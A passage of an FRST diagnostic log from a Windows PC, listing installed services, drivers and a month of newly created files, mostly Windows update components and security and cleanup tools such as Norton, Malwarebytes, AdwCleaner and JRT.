CHR HKLM-x32\...\Chrome\Extension: [kanflfepiobnpjbljmngfgegijhdpljm] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2013-04-01]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 EgisTec Service; C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisService.exe [689008 2010-03-25] (Egis Technology Inc. )
R2 Fitbit Connect; C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe [5738528 2014-11-07] (Fitbit, Inc.) [File not signed]
R2 FPLService; C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe [1641768 2013-06-07] (HP)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [46904 2013-12-17] (Hewlett-Packard Company)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [330136 2015-10-30] (Intel Corporation)
R2 IJPLMSVC; C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE [140456 2012-03-27] ()
R2 Intel® ME Service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe [128896 2012-07-17] (Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation)
R2 MBAMScheduler; C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe [1513784 2015-10-05] (Malwarebytes)
R2 MBAMService; C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamservice.exe [1135416 2015-10-05] (Malwarebytes)
R2 NS; C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\NS.exe [282016 2015-11-20] (Symantec Corporation)
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated) [File not signed]
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-07-17] (Synaptics Incorporated)
S3 TrueService; C:\Program Files\Common Files\AuthenTec\TrueService.exe [401856 2013-01-07] (AuthenTec, Inc.)
R2 valWBFPolicyService; C:\Windows\system32\valWBFPolicyService.exe [28160 2012-09-06] () [File not signed]
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [364464 2015-10-30] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24864 2015-10-30] (Microsoft Corporation)
S2 EraserSvc11511; "C:\Program Files (x86)\Norton Security\Engine\22.5.4.24\NS.exe" /h ccCommon [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BHDrvx64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\BASHDefs\20160213.003\BHDrvx64.sys [1665608 2015-10-08] (Symantec Corporation)
R1 ccSet_NS; C:\Windows\system32\drivers\NSx64\1605050.00F\ccSetx64.sys [173808 2015-09-23] (Symantec Corporation)
R1 CLVirtualDrive; C:\Windows\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [498512 2015-12-23] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [157520 2015-12-23] (Symantec Corporation)
R1 IDSVia64; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\IPSDefs\20160308.002\IDSvia64.sys [767224 2016-02-15] (Symantec Corporation)
R3 MBAMProtector; C:\WINDOWS\system32\drivers\mbam.sys [25816 2015-10-05] (Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\system32\drivers\MBAMSwissArmy.sys [192216 2016-03-09] (Malwarebytes)
R3 MBAMWebAccessControl; C:\WINDOWS\system32\drivers\mwac.sys [64216 2015-10-05] (Malwarebytes Corporation)
R3 NAVENG; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\ENG64.SYS [138488 2015-12-23] (Symantec Corporation)
R3 NAVEX15; C:\Program Files (x86)\Norton Security\NortonData\22.5.4.24\Definitions\VirusDefs\20160309.020\EX64.SYS [2148080 2015-12-23] (Symantec Corporation)
R3 netr28x; C:\Windows\system32\DRIVERS\netr28x.sys [2554528 2015-06-12] (MediaTek Inc.)
S3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [310528 2015-06-05] (Realtek Semiconductor Corp.)
R3 rt640x64; C:\Windows\System32\drivers\rt640x64.sys [589824 2015-10-30] (Realtek )
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-08-24] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-07-17] (Synaptics Incorporated)
R3 SRTSP; C:\Windows\System32\Drivers\NSx64\1605050.00F\SRTSP64.SYS [928496 2015-11-11] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NSx64\1605050.00F\SRTSPX64.SYS [50936 2015-09-23] (Symantec Corporation)
R0 SymEFASI; C:\Windows\System32\drivers\NSx64\1605050.00F\SYMEFASI64.SYS [1621232 2015-11-11] (Symantec Corporation)
S4 SymELAM; C:\Windows\system32\drivers\NSx64\1605050.00F\SymELAM.sys [24192 2015-09-23] (Symantec Corporation)
R3 SymEvent; C:\WINDOWS\system32\Drivers\SYMEVENT64x86.SYS [111344 2015-12-24] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NSx64\1605050.00F\Ironx64.SYS [297720 2015-09-23] (Symantec Corporation)
R1 SymNetS; C:\Windows\System32\Drivers\NSx64\1605050.00F\SYMNETS.SYS [577768 2015-11-11] (Symantec Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [44568 2015-10-30] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [293216 2015-10-30] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [118112 2015-10-30] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-02-08] (Hewlett-Packard Development Company, L.P.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2016-03-09 19:47 - 2016-03-09 19:47 - 00008389 _____ C:\Users\levilaing\Desktop\MBAM.txt
2016-03-09 18:32 - 2016-03-09 19:34 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2016-03-09 18:31 - 2016-03-09 18:31 - 00000910 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2016-03-09 18:31 - 2016-03-09 18:31 - 00000000 ____D C:\ProgramData\Malwarebytes
2016-03-09 18:31 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2016-03-09 18:31 - 2015-10-05 09:50 - 00064216 _____ (Malwarebytes Corporation) C:\WINDOWS\system32\Drivers\mwac.sys
2016-03-09 18:31 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2016-03-09 18:28 - 2016-03-09 18:28 - 22908888 _____ (Malwarebytes ) C:\Users\levilaing\Downloads\mbam-setup-2.2.0.1024.exe
2016-03-09 17:53 - 2016-03-09 17:54 - 00029841 _____ C:\Users\levilaing\Desktop\Addition.txt
2016-03-09 17:52 - 2016-03-09 19:47 - 00026088 _____ C:\Users\levilaing\Desktop\FRST.txt
2016-03-09 17:47 - 2016-03-09 17:47 - 00002268 _____ C:\Users\levilaing\Desktop\JRT.txt
2016-03-09 17:42 - 2016-03-09 17:42 - 01609216 _____ (Malwarebytes) C:\Users\levilaing\Downloads\JRT.exe
2016-03-09 17:27 - 2016-03-09 17:33 - 00000000 ____D C:\Program Files (x86)\AdwCleaner
2016-03-09 17:26 - 2016-03-09 17:26 - 01524224 _____ C:\Users\levilaing\Downloads\adwcleaner_5.101.exe
2016-03-09 16:45 - 2016-03-09 16:45 - 00019460 _____ C:\Users\levilaing\Desktop\Fixlog.txt
2016-03-09 16:34 - 2016-02-24 03:51 - 07474528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2016-03-09 16:34 - 2016-02-24 03:28 - 03449168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSService.dll
2016-03-09 16:34 - 2016-02-24 02:46 - 06607080 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2016-03-09 16:34 - 2016-02-24 02:11 - 01997152 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2016-03-09 16:34 - 2016-02-24 02:06 - 05242496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2016-03-09 16:34 - 2016-02-24 00:43 - 00286720 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-03-09 16:34 - 2016-02-24 00:40 - 01224704 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-03-09 16:34 - 2016-02-24 00:39 - 01390592 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2016-03-09 16:34 - 2016-02-24 00:11 - 03593216 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2016-03-09 16:34 - 2016-02-24 00:09 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-03-09 16:34 - 2016-02-24 00:07 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-03-09 16:34 - 2016-02-24 00:01 - 01831936 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-03-09 16:34 - 2016-02-24 00:00 - 02273792 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2016-03-09 16:34 - 2016-02-24 00:00 - 01098752 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2016-03-09 16:34 - 2016-02-23 23:55 - 01996288 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-03-09 16:34 - 2016-02-23 23:34 - 01707520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2016-03-09 16:34 - 2016-02-23 23:20 - 22376960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-03-09 16:34 - 2016-02-23 23:18 - 18677760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-03-09 16:34 - 2016-02-23 23:12 - 19339776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2016-03-09 16:34 - 2016-02-23 23:12 - 05321728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2016-03-09 16:34 - 2016-02-23 23:10 - 24600576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2016-03-09 16:34 - 2016-02-23 23:09 - 06972416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2016-03-09 16:34 - 2016-02-23 23:05 - 12586496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmp.dll
2016-03-09 16:34 - 2016-02-23 23:03 - 14252544 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmp.dll
2016-03-09 16:34 - 2016-02-23 22:59 - 05661696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2016-03-09 16:34 - 2016-02-23 22:55 - 07835648 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2016-03-09 16:33 - 2016-02-29 23:31 - 00848168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2016-03-09 16:33 - 2016-02-29 23:22 - 00709688 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2016-03-09 16:33 - 2016-02-24 03:52 - 01997328 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2016-03-09 16:33 - 2016-02-24 03:48 - 00713568 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2016-03-09 16:33 - 2016-02-24 03:47 - 01173344 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2016-03-09 16:33 - 2016-02-24 03:40 - 00513888 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2016-03-09 16:33 - 2016-02-24 03:34 - 01613664 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2016-03-09 16:33 - 2016-02-24 03:15 - 01557768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-03-09 16:33 - 2016-02-24 02:58 - 00794888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfds.dll
2016-03-09 16:33 - 2016-02-24 02:54 - 00127840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBSTOR.SYS
2016-03-09 16:33 - 2016-02-24 02:51 - 01322248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2016-03-09 16:33 - 2016-02-24 02:50 - 00808800 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-03-09 16:33 - 2016-02-24 02:43 - 00625000 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-03-09 16:33 - 2016-02-24 02:39 - 00358752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msv1_0.dll
2016-03-09 16:33 - 2016-02-24 02:39 - 00141560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-03-09 16:33 - 2016-02-24 02:19 - 00670928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfds.dll
2016-03-09 16:33 - 2016-02-24 02:14 - 00216416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00957608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00703840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-03-09 16:33 - 2016-02-24 02:11 - 00652392 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxgi.dll
2016-03-09 16:33 - 2016-02-24 02:11 - 00394080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2016-03-09 16:33 - 2016-02-24 02:11 - 00258280 _____ (Microsoft Corporation) C:\WINDOWS\system32\sqmapi.dll
2016-03-09 16:33 - 2016-02-24 02:10 - 00630632 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-03-09 16:33 - 2016-02-24 02:10 - 00576864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2016-03-09 16:33 - 2016-02-24 02:09 - 00640472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2016-03-09 16:33 - 2016-02-24 02:09 - 00147808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wermgr.exe
2016-03-09 16:33 - 2016-02-24 01:59 - 00294752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
2016-03-09 16:33 - 2016-02-24 01:39 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 01:39 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-03-09 16:33 - 2016-02-24 01:38 - 00187744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-03-09 16:33 - 2016-02-24 01:38 - 00111616 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-03-09 16:33 - 2016-02-24 01:37 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-03-09 16:33 - 2016-02-24 01:36 - 00060416 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00540752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-03-09 16:33 - 2016-02-24 01:35 - 00523752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxgi.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00220064 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sqmapi.dll
2016-03-09 16:33 - 2016-02-24 01:35 - 00045568 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2016-03-09 16:33 - 2016-02-24 01:33 - 00538736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wer.dll
2016-03-09 16:33 - 2016-02-24 01:33 - 00141664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wermgr.exe
2016-03-09 16:33 - 2016-02-24 01:31 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontsub.dll
2016-03-09 16:33 - 2016-02-24 01:30 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-03-09 16:33 - 2016-02-24 01:28 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-03-09 16:33 - 2016-02-24 01:23 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2016-03-09 16:33 - 2016-02-24 01:23 - 00068096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 01:22 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafBth.dll
2016-03-09 16:33 - 2016-02-24 01:20 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-03-09 16:33 - 2016-02-24 01:19 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-03-09 16:33 - 2016-02-24 01:19 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\seclogon.dll
2016-03-09 16:33 - 2016-02-24 01:15 - 00365568 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2016-03-09 16:33 - 2016-02-24 01:14 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-03-09 16:33 - 2016-02-24 01:13 - 00121856 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentActivation.dll
2016-03-09 16:33 - 2016-02-24 01:12 - 00243712 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-03-09 16:33 - 2016-02-24 01:12 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-03-09 16:33 - 2016-02-24 01:10 - 00093184 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-03-09 16:33 - 2016-02-24 01:09 - 00258560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-03-09 16:33 - 2016-02-24 01:09 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-03-09 16:33 - 2016-02-24 01:07 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-03-09 16:33 - 2016-02-24 01:05 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll
2016-03-09 16:33 - 2016-02-24 01:03 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2016-03-09 16:33 - 2016-02-24 01:02 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00764928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-03-09 16:33 - 2016-02-24 01:01 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\profext.dll
2016-03-09 16:33 - 2016-02-24 01:00 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-03-09 16:33 - 2016-02-24 00:59 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2016-03-09 16:33 - 2016-02-24 00:58 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\scapi.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00790528 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00224256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-03-09 16:33 - 2016-02-24 00:55 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00526336 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00288768 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-03-09 16:33 - 2016-02-24 00:54 - 00228352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wsqmcons.exe
2016-03-09 16:33 - 2016-02-24 00:54 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 00:53 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-03-09 16:33 - 2016-02-24 00:53 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-03-09 16:33 - 2016-02-24 00:52 - 00451584 _____ (Microsoft Corporation) C:\WINDOWS\system32\werui.dll
2016-03-09 16:33 - 2016-02-24 00:52 - 00048128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-03-09 16:33 - 2016-02-24 00:51 - 00037376 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2016-03-09 16:33 - 2016-02-24 00:49 - 00726528 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-03-09 16:33 - 2016-02-24 00:47 - 00093696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontsub.dll
2016-03-09 16:33 - 2016-02-24 00:46 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 01713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRHInproc.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00915456 _____ (Microsoft Corporation) C:\WINDOWS\system32\configurationclient.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00700416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-03-09 16:33 - 2016-02-24 00:44 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-03-09 16:33 - 2016-02-24 00:43 - 00957952 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2016-03-09 16:33 - 2016-02-24 00:41 - 00982016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-03-09 16:33 - 2016-02-24 00:41 - 00436736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-03-09 16:33 - 2016-02-24 00:40 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2016-03-09 16:33 - 2016-02-24 00:40 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-03-09 16:33 - 2016-02-24 00:39 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-03-09 16:33 - 2016-02-24 00:38 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-03-09 16:33 - 2016-02-24 00:36 - 01847808 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPDMC.exe
2016-03-09 16:33 - 2016-02-24 00:34 - 00938496 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-03-09 16:33 - 2016-02-24 00:34 - 00303104 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2016-03-09 16:33 - 2016-02-24 00:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-03-09 16:33 - 2016-02-24 00:32 - 00098304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentActivation.dll
2016-03-09 16:33 - 2016-02-24 00:31 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-03-09 16:33 - 2016-02-24 00:31 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00870912 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00196608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-03-09 16:33 - 2016-02-24 00:28 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-03-09 16:33 - 2016-02-24 00:25 - 00401408 _____ (Microsoft Corporation) C:\WINDOWS\system32\sharemediacpl.dll
2016-03-09 16:33 - 2016-02-24 00:23 - 00129024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-03-09 16:33 - 2016-02-24 00:22 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\profext.dll
2016-03-09 16:33 - 2016-02-24 00:21 - 00315904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2016-03-09 16:33 - 2016-02-24 00:21 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 01490432 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 00575488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-03-09 16:33 - 2016-02-24 00:18 - 00184832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-03-09 16:33 - 2016-02-24 00:17 - 00369664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-03-09 16:33 - 2016-02-24 00:16 - 00394752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\werui.dll
2016-03-09 16:33 - 2016-02-24 00:13 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 01443328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 00793600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 00552960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-03-09 16:33 - 2016-02-24 00:07 - 00890368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-03-09 16:33 - 2016-02-24 00:07 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-03-09 16:33 - 2016-02-24 00:04 - 01497088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-03-09 16:33 - 2016-02-24 00:03 - 00769536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-03-09 16:33 - 2016-02-23 23:57 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-03-09 16:33 - 2016-02-23 23:43 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2016-03-09 16:33 - 2016-02-23 23:22 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
